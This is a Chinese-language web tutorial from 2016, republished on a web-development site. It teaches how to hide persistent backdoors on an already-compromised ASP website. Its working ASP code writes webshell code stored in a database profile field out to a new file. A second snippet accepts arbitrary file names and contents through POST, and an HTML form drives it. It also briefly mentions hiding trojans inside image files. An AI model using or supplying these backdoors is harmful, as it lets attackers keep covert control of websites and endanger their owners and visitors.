教你巧妙利用.mdb后缀数据库做后门

2016-02-19 19:29 12 1 收藏

下面图老师小编要跟大家分享教你巧妙利用.mdb后缀数据库做后门,简单的过程中其实暗藏玄机,还是要细心学习,喜欢还请记得收藏哦!

【 tulaoshi.com - Web开发 】

  前言:好长时间了,从刚开始的站点管理器到现在流行的几款asp后门,相信大多网管都能说出这些经典webshell的名字,如海洋、老兵、蓝屏等,也相信大多数的网管学会了关键字的搜索方法来搜索这些木马,当然现在的时间如果再象隐藏后门就要讲些技巧啦,俗话说的好“佛高一尺,我高一丈”。

  我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦写到mp3文件里写到doc文件里都是可以的啦。

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/webkaifa/)

  copy 文件名/参数 + 文件名/参数 生成文件名

  这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀.mdb的数据库中,前提是在我们拿到一个webshell之后……

  我们所知道的,很多站点在用户注册的时候要让填好多东西例如:用户名、密码、QQ、邮箱、个人简介、电话、联系方式、住址一类的。而对应到数据库中也都会有相应的表、字段、值。我今天要做的就是,我注册一个用户在我的个人简介的地方上写入shell代码,然后修改他站点上的一个文件,使用的时候触发这个文件,就把我个人简历中的shell代码,备份到当前目录下。

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/webkaifa/)

  废话少说了,大家看代码:

  
  %
  if request("action")="firefox" then
  fname=request.querystring("fn")
  tname=request.querystring("tn")
  bname=request.querystring("bn")
  id=request.querystring("id")
  idvalue=request.querystring("idv")
  set rs=server.createobject("ADODB.recordset")
  sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""
  rs.open sql,conn,1,3
  if not rs.eof then
  content=rs(bname)
  else
  response.write "Nothing"
  end if
  set fso=Server.createObject("Scripting.FileSystemObject")
  set txtfile=fso.createtextfile(server.mappath(fname))
  txtfile.writeline(content)
  txtfile.close
  end if
  %

  将上边的代码加到站点的一个文件中,如news.asp。根据我们了解的信息,在其站点注册后,下载数据库看结构。我注册的firefox名字是在 user表,其id值为119 用于存放我注册简历的表字段为jl。

  news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119

  那么在使用的时候我们就可以在news.asp相同目录下写入一个名为 firefox.asp的webshell。以上可以说是万千隐藏方法中的一种,下边再说另外一种更方便的隐藏方法,这个方法就和mdb后缀无关系了。

  同样我们还是修改news.asp,将以下代码插入到对方news.asp中:

  
  %
  if request("action")="firefox" then
  n=request.form("n")
  c=request.form("c")
  set fso=Server.createObject("Scripting.FileSystemObject")
  set txtfile=fso.createtextfile(server.mappath(n))
  txtfile.writeline(c)
  txtfile.close
  end if
  %

  这段代码相对简单些,算是一个木马的服务端吧。使用的时候以这段代码配合:

  
  HTMLHEAD
  META http-equiv=Content-Type content="text/html; charset=gb2312"
  titleF.s.t火狐技术联盟[www.wrsky.com]/title
  FORM action="http://localhost/config.asp?action ... method=post
  META content="MSHTML 6.00.2900.2180" name=GENERATOR/HEAD
  BODYName:INPUT size=50
  name=n width="32"BRBRShell:TEXTAREA name=c rows=10 cols=80
  width="32"/TEXTAREAINPUT type=submit value=Save/FORM/BODY/HTML

  将以上代码中的:“http://localhost/config.asp?action=firefox”替换成你的服务端地址,然后保存为本地的.htm文件。本地打开后定义要生成的文件名、文件内容、远程提交, ok,又是一种留后门的方法。

来源:http://www.tulaoshi.com/n/20160219/1621136.html

延伸阅读
标签: MySQL mysql数据库
Write once - run anywhere 一次编写——随处运行 这是Java的一句行销口号,但是它同时也是PHP的关键特性之一。许多商业模型依赖于操作系统无关性来保证产品能够销售给广泛的客户群体。因而,为什么要把你自己绑在某种数据库厂商的身上呢?数据库抽象层使得你能够与数据库独立的开发你的应用程序。但是,通常情况下它们对性能的影响超过了...
标签: PHP
Write once - run anywhere 一次编写随处运行 这是Java的一句行销口号,但是它同时也是PHP的关键特性之一。许多商业模型依赖于操作系统无关性来保证产品能够销售给广泛的客户群体。因而,为什么要把你自己绑在某种数据库厂商的身上呢?数据库抽象层使得你能够与数据库独立的开发你的应用程序。但是,通常情况下它们对性能的...
目前,基于数据库服务器的桌面管理程序和Web程序已经有太多的应用了,尤其是网络的大量普及,孤立地数据库管理系统无法胜任分布式管理应用,但是面对基于Access数据库的现有的桌面应用我们也无法完全的摒弃。我们利用.Net 远程处理功能将连接和存取Access的行为封装为一个远程对象,供网络中其它客户端通过调用该远程对象来存取实际的Access数据...
标签: SQLServer
在SQL Server 2005中,它的另外一个强大的新特点是数据库快照。数据库快照是一个数据库的只读副本,它是数据库所有数据的映射,由快照被执行的时间点来决定它的内容。 这些数据库快照在报表方面是非常有价值,因为在快照数据库中或者在原数据库中,对于任何查询而言没有锁就将被执行。快照也可以使用在灾难恢复中,因为你可以将现有的数据恢...
面向:初学者。 目的:如果一年的数据较多,希望在分年的数据库中保存数据。 知识点: 1.数据库拆分。 2.文件查找技术。 3.文件复制。 4.链接表的刷新。 步骤: 1.将一些每年都要使用(修改,添加等)的表的名称前两个字母改为共同的(如:Or_业务人员名单,Or_收货人名单等),注意不要是“MS”,“SW”,“US”等系统要使用的字母。 2.将...

经验教程

478

收藏

35
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部